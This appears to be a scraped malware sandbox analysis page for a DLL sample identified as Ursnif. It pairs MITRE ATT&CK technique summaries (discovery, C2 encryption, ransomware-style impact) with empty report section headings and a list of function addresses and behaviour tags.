Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0f.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Function 00F94E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Function 00F935A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Function 00F93946, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Function 100017A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 00F93CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 100018D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 10001F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 10001B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00F96DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Function 00F91B47, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Function 00F94430, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Function 10001979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00F957AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00F92D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00F91041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00F95AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 10001AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 10001E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 10001CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 00F94A3C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Function 00F9243C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Function 00F9274E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Function 100015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 00F95988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 10001D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 10001030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 100016EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Function 00F9779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 00F91896, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Function 00F92A03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Function 00F97471, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 00F930AD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Function 00F941D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 10001C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 00F94BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 00F97B76, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00F97B5B, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00F95C4E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 10001236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 00F91AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Function 00F95872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON